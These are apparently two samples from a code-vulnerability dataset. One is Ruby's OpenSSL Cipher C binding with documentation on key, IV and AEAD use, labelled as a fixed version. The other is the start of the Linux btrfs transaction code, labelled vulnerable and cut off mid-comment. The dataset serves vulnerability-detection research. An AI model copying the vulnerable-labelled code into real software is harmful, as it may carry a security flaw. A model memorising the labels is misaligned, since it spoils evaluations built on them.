digest = NIL_P(vdigest) ? EVP_md5() : GetDigestPtr(vdigest);
GetCipher(self, ctx);
EVP_BytesToKey(EVP_CIPHER_CTX_cipher(ctx), digest, salt,
(unsigned char *)RSTRING_PTR(vpass), RSTRING_LENINT(vpass), iter, key, iv);
if (EVP_CipherInit_ex(ctx, NULL, NULL, key, iv, -1) != 1)
ossl_raise(eCipherError, NULL);
OPENSSL_cleanse(key, sizeof key);
OPENSSL_cleanse(iv, sizeof iv);
rb_ivar_set(self, id_key_set, Qtrue);
return Qnil;
}
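/*
 * EVP_CipherUpdate() takes an int for the input length, so inputs longer
 * than INT_MAX/2+1 bytes are fed to it in chunks; the total number of
 * bytes written is accumulated into *out_len_ptr.
 */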
static int
ossl_cipher_update_long(EVP_CIPHER_CTX *ctx, unsigned char *out, long *out_len_ptr,
const unsigned char *in, long in_len)
{
int out_part_len;
int limit = INT_MAX / 2 + 1;
long out_len = 0;
do {
int in_part_len = in_len > limit ? limit : (int)in_len;
if (!EVP_CipherUpdate(ctx, out ? (out + out_len) : 0,
&out_part_len, in, in_part_len))
return 0;
out_len += out_part_len;
in += in_part_len;
} while ((in_len -= limit) > 0);
if (out_len_ptr)
*out_len_ptr = out_len;
return 1;
}
/*
* call-seq:
* cipher.update(data [, buffer]) -> string or buffer
*
* Encrypts data in a streaming fashion. Hand consecutive blocks of data
* to the +update+ method in order to encrypt it. Returns the encrypted
* data chunk. When done, the output of Cipher#final should be additionally
* added to the result.
*
* If +buffer+ is given, the encryption/decryption result will be written to
* it. +buffer+ will be resized automatically.
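*
* A rough streaming sketch (+io+ is a hypothetical data source):
*
*   result = ""
*   while chunk = io.read(4096)
*     result << cipher.update(chunk)
*   end
*   result << cipher.final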
*/
static VALUE
ossl_cipher_update(int argc, VALUE *argv, VALUE self)
{
EVP_CIPHER_CTX *ctx;
unsigned char *in;
long in_len, out_len;
VALUE data, str;
rb_scan_args(argc, argv, "11", &data, &str);
if (!RTEST(rb_attr_get(self, id_key_set)))
ossl_raise(eCipherError, "key not set");
StringValue(data);
in = (unsigned char *)RSTRING_PTR(data);
if ((in_len = RSTRING_LEN(data)) == 0)
ossl_raise(rb_eArgError, "data must not be empty");
GetCipher(self, ctx);
out_len = in_len+EVP_CIPHER_CTX_block_size(ctx);
if (out_len <= 0) {
ossl_raise(rb_eRangeError,
"data too big to make output buffer: %ld bytes", in_len);
}
if (NIL_P(str)) {
str = rb_str_new(0, out_len);
} else {
StringValue(str);
rb_str_resize(str, out_len);
}
if (!ossl_cipher_update_long(ctx, (unsigned char *)RSTRING_PTR(str), &out_len, in, in_len))
ossl_raise(eCipherError, NULL);
assert(out_len < RSTRING_LEN(str));
rb_str_set_len(str, out_len);
return str;
}
/*
* call-seq:
* cipher.final -> string
*
* Returns the remaining data held in the cipher object. Further calls to
* Cipher#update or Cipher#final will return garbage. This call should always
* be made as the last call of an encryption or decryption operation, after
* having fed the entire plaintext or ciphertext to the Cipher instance.
*
* If an authenticated cipher was used, a CipherError is raised if the tag
* could not be authenticated successfully. Only call this method after
* setting the authentication tag and passing the entire contents of the
* ciphertext into the cipher.
*/
static VALUE
ossl_cipher_final(VALUE self)
{
EVP_CIPHER_CTX *ctx;
int out_len;
VALUE str;
GetCipher(self, ctx);
str = rb_str_new(0, EVP_CIPHER_CTX_block_size(ctx));
if (!EVP_CipherFinal_ex(ctx, (unsigned char *)RSTRING_PTR(str), &out_len))
ossl_raise(eCipherError, NULL);
assert(out_len <= RSTRING_LEN(str));
rb_str_set_len(str, out_len);
return str;
}
/*
* call-seq:
* cipher.name -> string
*
* Returns the name of the cipher which may differ slightly from the original
* name provided.
*/
static VALUE
ossl_cipher_name(VALUE self)
{
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
return rb_str_new2(EVP_CIPHER_name(EVP_CIPHER_CTX_cipher(ctx)));
}
/*
* call-seq:
* cipher.key = string -> string
*
* Sets the cipher key. To generate a key, you should either use a secure
* random byte string or, if the key is to be derived from a password, you
* should rely on PBKDF2 functionality provided by OpenSSL::PKCS5. To
* generate a secure random-based key, Cipher#random_key may be used.
*
* Only call this method after calling Cipher#encrypt or Cipher#decrypt.
*/
static VALUE
ossl_cipher_set_key(VALUE self, VALUE key)
{
EVP_CIPHER_CTX *ctx;
int key_len;
StringValue(key);
GetCipher(self, ctx);
key_len = EVP_CIPHER_CTX_key_length(ctx);
if (RSTRING_LEN(key) != key_len)
ossl_raise(rb_eArgError, "key must be %d bytes", key_len);
if (EVP_CipherInit_ex(ctx, NULL, NULL, (unsigned char *)RSTRING_PTR(key), NULL, -1) != 1)
ossl_raise(eCipherError, NULL);
rb_ivar_set(self, id_key_set, Qtrue);
return key;
}
/*
* call-seq:
* cipher.iv = string -> string
*
* Sets the cipher IV. Please note that since you should never be using ECB
* mode, an IV is always explicitly required and should be set prior to
* encryption. The IV itself can be safely transmitted in public, but it
* should be unpredictable to prevent certain kinds of attacks. You may use
* Cipher#random_iv to create a secure random IV.
*
* Only call this method after calling Cipher#encrypt or Cipher#decrypt.
*
* If not explicitly set, the OpenSSL default of an all-zeroes ("\\0") IV is
* used.
*/
static VALUE
ossl_cipher_set_iv(VALUE self, VALUE iv)
{
EVP_CIPHER_CTX *ctx;
int iv_len = 0;
StringValue(iv);
GetCipher(self, ctx);
#if defined(HAVE_AUTHENTICATED_ENCRYPTION)
if (EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER)
iv_len = (int)(VALUE)EVP_CIPHER_CTX_get_app_data(ctx);
#endif
if (!iv_len)
iv_len = EVP_CIPHER_CTX_iv_length(ctx);
if (RSTRING_LEN(iv) != iv_len)
ossl_raise(rb_eArgError, "iv must be %d bytes", iv_len);
if (EVP_CipherInit_ex(ctx, NULL, NULL, NULL, (unsigned char *)RSTRING_PTR(iv), -1) != 1)
ossl_raise(eCipherError, NULL);
return iv;
}
#ifdef HAVE_AUTHENTICATED_ENCRYPTION
/*
* call-seq:
* cipher.auth_data = string -> string
*
* Sets the cipher's additional authenticated data. This field must be
* set when using AEAD cipher modes such as GCM or CCM. If no associated
* data shall be used, this method must *still* be called with a value of "".
* The contents of this field should be non-sensitive data which will be
* authenticated together with the ciphertext: it is included in computing the
* authentication tag that validates the contents of the ciphertext.
*
* The AAD must be set prior to encryption or decryption. In encryption mode,
* it must be set after calling Cipher#encrypt and setting Cipher#key= and
* Cipher#iv=. When decrypting, the authenticated data must be set after key,
* iv and especially *after* the authentication tag has been set. I.e. set it
* only after calling Cipher#decrypt, Cipher#key=, Cipher#iv= and
* Cipher#auth_tag= first.
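*
* A decryption-side sketch of that ordering (+key+, +nonce+, +tag+ and
* +auth_data+ are assumed to be available already):
*
*   decipher = OpenSSL::Cipher.new('aes-128-gcm').decrypt
*   decipher.key = key
*   decipher.iv = nonce
*   decipher.auth_tag = tag
*   decipher.auth_data = auth_data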
*/
static VALUE
ossl_cipher_set_auth_data(VALUE self, VALUE data)
{
EVP_CIPHER_CTX *ctx;
unsigned char *in;
long in_len, out_len;
StringValue(data);
in = (unsigned char *) RSTRING_PTR(data);
in_len = RSTRING_LEN(data);
GetCipher(self, ctx);
if (!ossl_cipher_update_long(ctx, NULL, &out_len, in, in_len))
ossl_raise(eCipherError, "couldn't set additional authenticated data");
return data;
}
/*
* call-seq:
* cipher.auth_tag(tag_len = 16) -> String
*
* Gets the authentication tag generated by Authenticated Encryption Cipher
* modes (GCM for example). This tag may be stored along with the ciphertext,
* then set on the decryption cipher to authenticate the contents of the
* ciphertext against changes. If the optional integer parameter +tag_len+ is
* given, the returned tag will be +tag_len+ bytes long. If the parameter is
* omitted, the default length of 16 bytes or the length previously set by
* #auth_tag_len= will be used. For maximum security, the longest possible
* tag length should be chosen.
*
* The tag may only be retrieved after calling Cipher#final.
*/
static VALUE
ossl_cipher_get_auth_tag(int argc, VALUE *argv, VALUE self)
{
VALUE vtag_len, ret;
EVP_CIPHER_CTX *ctx;
int tag_len = 16;
rb_scan_args(argc, argv, "01", &vtag_len);
if (NIL_P(vtag_len))
vtag_len = rb_attr_get(self, id_auth_tag_len);
if (!NIL_P(vtag_len))
tag_len = NUM2INT(vtag_len);
GetCipher(self, ctx);
if (!(EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER))
ossl_raise(eCipherError, "authentication tag not supported by this cipher");
ret = rb_str_new(NULL, tag_len);
if (!EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_AEAD_GET_TAG, tag_len, RSTRING_PTR(ret)))
ossl_raise(eCipherError, "retrieving the authentication tag failed");
return ret;
}
/*
* call-seq:
* cipher.auth_tag = string -> string
*
* Sets the authentication tag to verify the contents of the
* ciphertext. The tag must be set after calling Cipher#decrypt,
* Cipher#key= and Cipher#iv=, but before assigning the associated
* authenticated data using Cipher#auth_data= and of course, before
* decrypting any of the ciphertext. After all decryption is
* performed, the tag is verified automatically in the call to
* Cipher#final.
*
* For OCB mode, the tag length must be supplied with #auth_tag_len=
* beforehand.
*/
static VALUE
ossl_cipher_set_auth_tag(VALUE self, VALUE vtag)
{
EVP_CIPHER_CTX *ctx;
unsigned char *tag;
int tag_len;
StringValue(vtag);
tag = (unsigned char *) RSTRING_PTR(vtag);
tag_len = RSTRING_LENINT(vtag);
GetCipher(self, ctx);
if (!(EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER))
ossl_raise(eCipherError, "authentication tag not supported by this cipher");
if (!EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_AEAD_SET_TAG, tag_len, tag))
ossl_raise(eCipherError, "unable to set AEAD tag");
return vtag;
}
/*
* call-seq:
* cipher.auth_tag_len = Integer -> Integer
*
* Sets the length of the authentication tag to be generated or to be given for
* AEAD ciphers that require it as an input parameter. Note that not all AEAD
* ciphers support this method.
*
* In OCB mode, the length must be supplied both when encrypting and when
* decrypting, and must be set before specifying an IV.
*/
static VALUE
ossl_cipher_set_auth_tag_len(VALUE self, VALUE vlen)
{
int tag_len = NUM2INT(vlen);
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
if (!(EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER))
ossl_raise(eCipherError, "AEAD not supported by this cipher");
if (!EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_AEAD_SET_TAG, tag_len, NULL))
ossl_raise(eCipherError, "unable to set authentication tag length");
/* for #auth_tag */
rb_ivar_set(self, id_auth_tag_len, INT2NUM(tag_len));
return vlen;
}
/*
* call-seq:
* cipher.authenticated? -> boolean
*
* Indicates whether this Cipher instance uses an Authenticated Encryption
* mode.
*/
static VALUE
ossl_cipher_is_authenticated(VALUE self)
{
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
return (EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER) ? Qtrue : Qfalse;
}
/*
* call-seq:
* cipher.iv_len = integer -> integer
*
* Sets the IV/nonce length of the Cipher. Normally block ciphers don't allow
* changing the IV length, but some modes use the IV as a 'nonce'. You may need
* this for interoperability with other applications.
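*
* For example (a sketch; in this implementation only AEAD ciphers accept it):
*
*   cipher = OpenSSL::Cipher.new('aes-128-gcm').encrypt
*   cipher.iv_len = 12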
*/
static VALUE
ossl_cipher_set_iv_length(VALUE self, VALUE iv_length)
{
int len = NUM2INT(iv_length);
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
if (!(EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER))
ossl_raise(eCipherError, "cipher does not support AEAD");
if (!EVP_CIPHER_CTX_ctrl(ctx, EVP_CTRL_AEAD_SET_IVLEN, len, NULL))
ossl_raise(eCipherError, "unable to set IV length");
/*
* EVP_CIPHER_CTX_iv_length() returns the default length. So we need to save
* the length somewhere. Luckily currently we aren't using app_data.
*/
EVP_CIPHER_CTX_set_app_data(ctx, (void *)(VALUE)len);
return iv_length;
}
#else
#define ossl_cipher_set_auth_data rb_f_notimplement
#define ossl_cipher_get_auth_tag rb_f_notimplement
#define ossl_cipher_set_auth_tag rb_f_notimplement
#define ossl_cipher_set_auth_tag_len rb_f_notimplement
#define ossl_cipher_is_authenticated rb_f_notimplement
#define ossl_cipher_set_iv_length rb_f_notimplement
#endif
/*
* call-seq:
* cipher.key_len = integer -> integer
*
* Sets the key length of the cipher. If the cipher is a fixed length cipher
* then attempting to set the key length to any value other than the fixed
* value is an error.
*
* Under normal circumstances you do not need to call this method (and probably shouldn't).
*
* See EVP_CIPHER_CTX_set_key_length for further information.
*/
static VALUE
ossl_cipher_set_key_length(VALUE self, VALUE key_length)
{
int len = NUM2INT(key_length);
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
if (EVP_CIPHER_CTX_set_key_length(ctx, len) != 1)
ossl_raise(eCipherError, NULL);
return key_length;
}
/*
* call-seq:
* cipher.padding = integer -> integer
*
* Enables or disables padding. By default encryption operations are padded using standard block padding and the
* padding is checked and removed when decrypting. If the pad parameter is zero then no padding is performed; the
* total amount of data encrypted or decrypted must then be a multiple of the block size or an error will occur.
*
* See EVP_CIPHER_CTX_set_padding for further information.
*/
static VALUE
ossl_cipher_set_padding(VALUE self, VALUE padding)
{
EVP_CIPHER_CTX *ctx;
int pad = NUM2INT(padding);
GetCipher(self, ctx);
if (EVP_CIPHER_CTX_set_padding(ctx, pad) != 1)
ossl_raise(eCipherError, NULL);
return padding;
}
/*
* call-seq:
* cipher.key_len -> integer
*
* Returns the key length in bytes of the Cipher.
*/
static VALUE
ossl_cipher_key_length(VALUE self)
{
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
return INT2NUM(EVP_CIPHER_CTX_key_length(ctx));
}
/*
* call-seq:
* cipher.iv_len -> integer
*
* Returns the expected length in bytes for an IV for this Cipher.
*/
static VALUE
ossl_cipher_iv_length(VALUE self)
{
EVP_CIPHER_CTX *ctx;
int len = 0;
GetCipher(self, ctx);
#if defined(HAVE_AUTHENTICATED_ENCRYPTION)
if (EVP_CIPHER_CTX_flags(ctx) & EVP_CIPH_FLAG_AEAD_CIPHER)
len = (int)(VALUE)EVP_CIPHER_CTX_get_app_data(ctx);
#endif
if (!len)
len = EVP_CIPHER_CTX_iv_length(ctx);
return INT2NUM(len);
}
/*
* call-seq:
* cipher.block_size -> integer
*
* Returns the size in bytes of the blocks on which this Cipher operates.
*/
static VALUE
ossl_cipher_block_size(VALUE self)
{
EVP_CIPHER_CTX *ctx;
GetCipher(self, ctx);
return INT2NUM(EVP_CIPHER_CTX_block_size(ctx));
}
/*
* INIT
*/
void
Init_ossl_cipher(void)
{
#if 0
mOSSL = rb_define_module("OpenSSL");
eOSSLError = rb_define_class_under(mOSSL, "OpenSSLError", rb_eStandardError);
#endif
/* Document-class: OpenSSL::Cipher
*
* Provides symmetric algorithms for encryption and decryption. The
* algorithms that are available depend on the particular version
* of OpenSSL that is installed.
*
* === Listing all supported algorithms
*
* A list of supported algorithms can be obtained by
*
* puts OpenSSL::Cipher.ciphers
*
* === Instantiating a Cipher
*
* There are several ways to create a Cipher instance. Generally, a
* Cipher algorithm is categorized by its name, the key length in bits
* and the cipher mode to be used. The most generic way to create a
* Cipher is the following
*
* cipher = OpenSSL::Cipher.new('<name>-<key length>-<mode>')
*
* That is, a string consisting of the hyphenated concatenation of the
* individual components name, key length and mode. Either all uppercase
* or all lowercase strings may be used, for example:
*
* cipher = OpenSSL::Cipher.new('AES-128-CBC')
*
* For each algorithm supported, there is a class defined under the
* Cipher class that goes by the name of the cipher, e.g. to obtain an
* instance of AES, you could also use
*
* # these are equivalent
* cipher = OpenSSL::Cipher::AES.new(128, :CBC)
* cipher = OpenSSL::Cipher::AES.new(128, 'CBC')
* cipher = OpenSSL::Cipher::AES.new('128-CBC')
*
* Finally, due to its widespread use, there are also extra classes
* defined for the different key sizes of AES
*
* cipher = OpenSSL::Cipher::AES128.new(:CBC)
* cipher = OpenSSL::Cipher::AES192.new(:CBC)
* cipher = OpenSSL::Cipher::AES256.new(:CBC)
*
* === Choosing either encryption or decryption mode
*
* Encryption and decryption are often very similar operations for
* symmetric algorithms; this is reflected by not having to choose
* different classes for either operation - both can be done using the
* same class. Still, after obtaining a Cipher instance, we need to
* tell the instance what it is that we intend to do with it, so we
* need to call either
*
* cipher.encrypt
*
* or
*
* cipher.decrypt
*
* on the Cipher instance. This should be the first call after creating
* the instance, otherwise configuration that has already been set could
* get lost in the process.
*
* === Choosing a key
*
* Symmetric encryption requires a key that is the same for the encrypting
* and for the decrypting party and after initial key establishment should
* be kept as private information. There are a lot of ways to create
* insecure keys, the most notable being to simply take a password as the key
* without processing the password further. A simple and secure way to
* create a key for a particular Cipher is
*
* cipher = OpenSSL::Cipher::AES256.new(:CFB)
* cipher.encrypt
* key = cipher.random_key # also sets the generated key on the Cipher
*
* If you absolutely need to use passwords as encryption keys, you
* should use Password-Based Key Derivation Function 2 (PBKDF2) by
* generating the key with the help of the functionality provided by
* OpenSSL::PKCS5.pbkdf2_hmac_sha1 or OpenSSL::PKCS5.pbkdf2_hmac.
*
* Although there is Cipher#pkcs5_keyivgen, its use is deprecated and
* it should only be used in legacy applications because it does not use
* the newer PKCS#5 v2 algorithms.
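*
* A PBKDF2 sketch (the salt size, iteration count and +password+ are
* example values only):
*
*   salt = OpenSSL::Random.random_bytes(16)
*   key  = OpenSSL::PKCS5.pbkdf2_hmac_sha1(password, salt, 20_000, cipher.key_len)
*   cipher.key = key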
*
* === Choosing an IV
*
* The cipher modes CBC, CFB, OFB and CTR all need an "initialization
* vector", or short, IV. ECB mode is the only mode that does not require
* an IV, but there is almost no legitimate use case for this mode
* because of the fact that it does not sufficiently hide plaintext
* patterns. Therefore
*
* <b>You should never use ECB mode unless you are absolutely sure that
* you absolutely need it</b>
*
* Because of this, you will end up with a mode that explicitly requires
* an IV in any case. Note that for backwards compatibility reasons,
* setting an IV is not explicitly mandated by the Cipher API. If not
* set, OpenSSL itself defaults to an all-zeroes IV (the zero byte "\\0", not
* the character "0"). Although the IV can be seen as public information, i.e.
* it may be transmitted in public once generated, it should still stay
* unpredictable to prevent certain kinds of attacks. Therefore, ideally
*
* <b>Always create a secure random IV for every encryption of your
* Cipher</b>
*
* A new, random IV should be created for every encryption of data. Think
* of the IV as a nonce (number used once) - it's public but random and
* unpredictable. A secure random IV can be created as follows
*
* cipher = ...
* cipher.encrypt
* key = cipher.random_key
* iv = cipher.random_iv # also sets the generated IV on the Cipher
*
* Although the key is generally a random value, too, it is a bad choice
* as an IV. There are elaborate ways in which an attacker can take advantage
* of such an IV. As a general rule of thumb, exposing the key directly
* or indirectly should be avoided at all cost and exceptions only be
* made with good reason.
*
* === Calling Cipher#final
*
* ECB (which should not be used) and CBC are both block-based modes.
* This means that unlike for the other streaming-based modes, they
* operate on fixed-size blocks of data, and therefore they require a
* "finalization" step to produce or correctly decrypt the last block of
* data by appropriately handling some form of padding. Therefore it is
* essential to add the output of OpenSSL::Cipher#final to your
* encryption/decryption buffer or you will end up with decryption errors
* or truncated data.
*
* Although this is not really necessary for streaming-mode ciphers, it is
* still recommended to apply the same pattern of adding the output of
* Cipher#final there as well - it also enables you to switch between
* modes more easily in the future.
*
* === Encrypting and decrypting some data
*
* data = "Very, very confidential data"
*
* cipher = OpenSSL::Cipher::AES.new(128, :CBC)
* cipher.encrypt
* key = cipher.random_key
* iv = cipher.random_iv
*
* encrypted = cipher.update(data) + cipher.final
* ...
* decipher = OpenSSL::Cipher::AES.new(128, :CBC)
* decipher.decrypt
* decipher.key = key
* decipher.iv = iv
*
* plain = decipher.update(encrypted) + decipher.final
*
* puts data == plain #=> true
*
* === Authenticated Encryption and Associated Data (AEAD)
*
* If the OpenSSL version used supports it, an Authenticated Encryption
* mode (such as GCM or CCM) should always be preferred over any
* unauthenticated mode. Currently, OpenSSL supports AE only in combination
* with Associated Data (AEAD) where additional associated data is included
* in the encryption process to compute a tag at the end of the encryption.
* This tag will also be used in the decryption process and by verifying
* its validity, the authenticity of a given ciphertext is established.
*
* This is superior to unauthenticated modes in that it makes it possible to detect
* if somebody effectively changed the ciphertext after it had been
* encrypted. This prevents malicious modifications of the ciphertext that
* could otherwise be exploited to modify ciphertexts in ways beneficial to
* potential attackers.
*
* Associated data is used where there is additional information, such as
* headers or some metadata, that must also be authenticated but does not
* necessarily need to be encrypted. If no associated data is needed for
* encryption and later decryption, the OpenSSL library still requires a
* value to be set - "" may be used in case none is available.
*
* An example using the GCM (Galois/Counter Mode). You have a 16-byte +key+,
* a 12-byte (96-bit) +nonce+ and the associated data +auth_data+. Be sure
* not to reuse the +key+ and +nonce+ pair. Reusing a nonce ruins the
* security guarantees of GCM mode.
*
* cipher = OpenSSL::Cipher::AES.new(128, :GCM).encrypt
* cipher.key = key
* cipher.iv = nonce
* cipher.auth_data = auth_data
*
* encrypted = cipher.update(data) + cipher.final
* tag = cipher.auth_tag # produces a 16-byte tag by default
*
* Now you are the receiver. You know the +key+ and have received +nonce+,
* +auth_data+, +encrypted+ and +tag+ through an untrusted network. Note
* that GCM accepts an arbitrary length tag between 1 and 16 bytes. You may
* additionally need to check that the received tag has the correct length,
* or you allow attackers to forge a valid single-byte tag for the tampered
* ciphertext with a probability of 1/256.
*
* raise "tag is truncated!" unless tag.bytesize == 16
* decipher = OpenSSL::Cipher::AES.new(128, :GCM).decrypt
* decipher.key = key
* decipher.iv = nonce
* decipher.auth_tag = tag
* decipher.auth_data = auth_data
*
* decrypted = decipher.update(encrypted) + decipher.final
*
* puts data == decrypted #=> true
*/
cCipher = rb_define_class_under(mOSSL, "Cipher", rb_cObject);
eCipherError = rb_define_class_under(cCipher, "CipherError", eOSSLError);
rb_define_alloc_func(cCipher, ossl_cipher_alloc);
rb_define_copy_func(cCipher, ossl_cipher_copy);
rb_define_module_function(cCipher, "ciphers", ossl_s_ciphers, 0);
rb_define_method(cCipher, "initialize", ossl_cipher_initialize, 1);
rb_define_method(cCipher, "reset", ossl_cipher_reset, 0);
rb_define_method(cCipher, "encrypt", ossl_cipher_encrypt, -1);
rb_define_method(cCipher, "decrypt", ossl_cipher_decrypt, -1);
rb_define_method(cCipher, "pkcs5_keyivgen", ossl_cipher_pkcs5_keyivgen, -1);
rb_define_method(cCipher, "update", ossl_cipher_update, -1);
rb_define_method(cCipher, "final", ossl_cipher_final, 0);
rb_define_method(cCipher, "name", ossl_cipher_name, 0);
rb_define_method(cCipher, "key=", ossl_cipher_set_key, 1);
rb_define_method(cCipher, "auth_data=", ossl_cipher_set_auth_data, 1);
rb_define_method(cCipher, "auth_tag=", ossl_cipher_set_auth_tag, 1);
rb_define_method(cCipher, "auth_tag", ossl_cipher_get_auth_tag, -1);
rb_define_method(cCipher, "auth_tag_len=", ossl_cipher_set_auth_tag_len, 1);
rb_define_method(cCipher, "authenticated?", ossl_cipher_is_authenticated, 0);
rb_define_method(cCipher, "key_len=", ossl_cipher_set_key_length, 1);
rb_define_method(cCipher, "key_len", ossl_cipher_key_length, 0);
rb_define_method(cCipher, "iv=", ossl_cipher_set_iv, 1);
rb_define_method(cCipher, "iv_len=", ossl_cipher_set_iv_length, 1);
rb_define_method(cCipher, "iv_len", ossl_cipher_iv_length, 0);
rb_define_method(cCipher, "block_size", ossl_cipher_block_size, 0);
rb_define_method(cCipher, "padding=", ossl_cipher_set_padding, 1);
id_auth_tag_len = rb_intern_const("auth_tag_len");
id_key_set = rb_intern_const("key_set");
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/good_5329_0 |
crossvul-cpp_data_bad_3783_4 | /*
* Copyright (C) 2007 Oracle. All rights reserved.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public
* License v2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* General Public License for more details.
*
* You should have received a copy of the GNU General Public
* License along with this program; if not, write to the
* Free Software Foundation, Inc., 59 Temple Place - Suite 330,
* Boston, MA 021110-1307, USA.
*/
#include <linux/fs.h>
#include <linux/slab.h>
#include <linux/sched.h>
#include <linux/writeback.h>
#include <linux/pagemap.h>
#include <linux/blkdev.h>
#include <linux/uuid.h>
#include "ctree.h"
#include "disk-io.h"
#include "transaction.h"
#include "locking.h"
#include "tree-log.h"
#include "inode-map.h"
#include "volumes.h"
#include "dev-replace.h"
#define BTRFS_ROOT_TRANS_TAG 0
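/*
 * Drop one reference on @transaction; the structure is freed once the
 * last holder (tracked in ->use_count) has put its reference.
 */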
void put_transaction(struct btrfs_transaction *transaction)
{
WARN_ON(atomic_read(&transaction->use_count) == 0);
if (atomic_dec_and_test(&transaction->use_count)) {
BUG_ON(!list_empty(&transaction->list));
WARN_ON(transaction->delayed_refs.root.rb_node);
memset(transaction, 0, sizeof(*transaction));
kmem_cache_free(btrfs_transaction_cachep, transaction);
}
}
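/*
 * Make ->commit_root point at the root's current node, dropping the
 * reference held on the previous commit root's extent buffer.
 */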
static noinline void switch_commit_root(struct btrfs_root *root)
{
free_extent_buffer(root->commit_root);
root->commit_root = btrfs_root_node(root);
}
/*
* either allocate a new transaction or hop into the existing one
*/
static noinline int join_transaction(struct btrfs_root *root, int type)
{
struct btrfs_transaction *cur_trans;
struct btrfs_fs_info *fs_info = root->fs_info;
spin_lock(&fs_info->trans_lock);
loop:
/* The file system has been taken offline. No new transactions. */
if (fs_info->fs_state & BTRFS_SUPER_FLAG_ERROR) {
spin_unlock(&fs_info->trans_lock);
return -EROFS;
}
if (fs_info->trans_no_join) {
/*
* If we are JOIN_NOLOCK we're already committing a current
* transaction, we just need a handle to deal with something
* when committing the transaction, such as inode cache and
* space cache. It is a special case.
*/
if (type != TRANS_JOIN_NOLOCK) {
spin_unlock(&fs_info->trans_lock);
return -EBUSY;
}
}
cur_trans = fs_info->running_transaction;
if (cur_trans) {
if (cur_trans->aborted) {
spin_unlock(&fs_info->trans_lock);
return cur_trans->aborted;
}
atomic_inc(&cur_trans->use_count);
atomic_inc(&cur_trans->num_writers);
cur_trans->num_joined++;
spin_unlock(&fs_info->trans_lock);
return 0;
}
spin_unlock(&fs_info->trans_lock);
/*
* If we are ATTACH, we just want to catch the current transaction,
* and commit it. If there is no transaction, just return ENOENT.
*/
if (type == TRANS_ATTACH)
return -ENOENT;
cur_trans = kmem_cache_alloc(btrfs_transaction_cachep, GFP_NOFS);
if (!cur_trans)
return -ENOMEM;
spin_lock(&fs_info->trans_lock);
if (fs_info->running_transaction) {
/*
* someone started a transaction after we unlocked. Make sure
* to redo the trans_no_join checks above
*/
kmem_cache_free(btrfs_transaction_cachep, cur_trans);
cur_trans = fs_info->running_transaction;
goto loop;
} else if (fs_info->fs_state & BTRFS_SUPER_FLAG_ERROR) {
spin_unlock(&fs_info->trans_lock);
kmem_cache_free(btrfs_transaction_cachep, cur_trans);
return -EROFS;
}
atomic_set(&cur_trans->num_writers, 1);
cur_trans->num_joined = 0;
init_waitqueue_head(&cur_trans->writer_wait);
init_waitqueue_head(&cur_trans->commit_wait);
cur_trans->in_commit = 0;
cur_trans->blocked = 0;
/*
* One for this trans handle, one so it will live on until we
* commit the transaction.
*/
atomic_set(&cur_trans->use_count, 2);
cur_trans->commit_done = 0;
cur_trans->start_time = get_seconds();
cur_trans->delayed_refs.root = RB_ROOT;
cur_trans->delayed_refs.num_entries = 0;
cur_trans->delayed_refs.num_heads_ready = 0;
cur_trans->delayed_refs.num_heads = 0;
cur_trans->delayed_refs.flushing = 0;
cur_trans->delayed_refs.run_delayed_start = 0;
/*
* although the tree mod log is per file system and not per transaction,
* the log must never go across transaction boundaries.
*/
smp_mb();
if (!list_empty(&fs_info->tree_mod_seq_list))
WARN(1, KERN_ERR "btrfs: tree_mod_seq_list not empty when "
"creating a fresh transaction\n");
if (!RB_EMPTY_ROOT(&fs_info->tree_mod_log))
WARN(1, KERN_ERR "btrfs: tree_mod_log rb tree not empty when "
"creating a fresh transaction\n");
atomic_set(&fs_info->tree_mod_seq, 0);
spin_lock_init(&cur_trans->commit_lock);
spin_lock_init(&cur_trans->delayed_refs.lock);
INIT_LIST_HEAD(&cur_trans->pending_snapshots);
list_add_tail(&cur_trans->list, &fs_info->trans_list);
extent_io_tree_init(&cur_trans->dirty_pages,
fs_info->btree_inode->i_mapping);
fs_info->generation++;
cur_trans->transid = fs_info->generation;
fs_info->running_transaction = cur_trans;
cur_trans->aborted = 0;
spin_unlock(&fs_info->trans_lock);
return 0;
}
/*
* this does all the record keeping required to make sure that a reference
* counted root is properly recorded in a given transaction. This is required
* to make sure the old root from before we joined the transaction is deleted
* when the transaction commits
*/
static int record_root_in_trans(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
if (root->ref_cows && root->last_trans < trans->transid) {
WARN_ON(root == root->fs_info->extent_root);
WARN_ON(root->commit_root != root->node);
/*
* see below for in_trans_setup usage rules
* we have the reloc mutex held now, so there
* is only one writer in this function
*/
root->in_trans_setup = 1;
/* make sure readers find in_trans_setup before
* they find our root->last_trans update
*/
smp_wmb();
spin_lock(&root->fs_info->fs_roots_radix_lock);
if (root->last_trans == trans->transid) {
spin_unlock(&root->fs_info->fs_roots_radix_lock);
return 0;
}
radix_tree_tag_set(&root->fs_info->fs_roots_radix,
(unsigned long)root->root_key.objectid,
BTRFS_ROOT_TRANS_TAG);
spin_unlock(&root->fs_info->fs_roots_radix_lock);
root->last_trans = trans->transid;
/* this is pretty tricky. We don't want to
* take the relocation lock in btrfs_record_root_in_trans
* unless we're really doing the first setup for this root in
* this transaction.
*
* Normally we'd use root->last_trans as a flag to decide
* if we want to take the expensive mutex.
*
* But, we have to set root->last_trans before we
* init the relocation root, otherwise, we trip over warnings
